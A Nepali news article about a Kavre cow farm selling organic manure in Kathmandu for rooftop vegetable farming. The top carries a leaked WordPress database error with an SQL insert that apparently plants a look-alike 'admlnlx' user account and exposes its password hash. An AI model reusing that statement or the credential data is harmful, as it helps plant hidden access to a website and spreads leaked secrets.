WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmI2B4CNRwQnyV1St8Bf1tWPNlMx.T/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 15:00:42', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ ८ –
काठमाडौं उपत्यकासहित अन्य सहरी क्षेत्रमा कौसी तथा गमलामा गरिने तरकारी खेतीको लागि प्रांगारिक मलको बिक्री वितरण सुरु भएको छ । गौतमश्री अर्गानिक गाई फार्मले काठमाडौंको कुलेश्वरमा प्रांगारिक मलको बिक्री वितरण सुरु गरेको हो ।
घरको छत तथा गमलामा तरकारी खेती गर्न चाहनेहरुलाई लक्षित गरेर सहरभित्रै प्रांगारिक मलको बिक्री सुरु गरिएको गौतमश्री अर्गानिक गाई फार्मका अध्यक्ष राम बहादुर गौतमले जानकारी दिनुभयो । काभ्रेको पातलेखेतमा पालिएका तीन सय गाईको मलबाट तयार पारिएको प्रांगारिक मल काठमाडौंमा २ रुपैयाँको १० किलोको दरले बिक्री थालिएको छ ।
भारतबाट बार्षिक २ अर्बको हरियो तरकारी आयात भैरहेको अवस्थामा कौसी, छत तथा गमलामा हरियो तरकारी फलाएर आत्मनिर्भर हुन सकिन्छ भन्ने सन्देश दिन पनि प्रांगारिक मलको बिक्री सुरु गरिएको अध्यक्ष गौतमले जानकारी दिनुभयो । फर्मले प्रांगारिक मलको साथै तरकारी तथा सागपातका बेर्ना तथा गमला र क्यारेट पनि उपलब्ध गराउने जनाएको छ ।
आफ्नो फार्मले मात्रै दैनिक ५ सय किलो प्रांगारिक मल उत्पादन गरेको र सबै गाई फार्मले यसैगरी मल उत्पादन गरेमा एकातिर मलको सदुपयोग हुने र अर्कोतिर हरियो तरकारीको आयात रोक्न सकिने फर्मका अध्यक्ष रामबहादुर गौतमको दाबी छ ।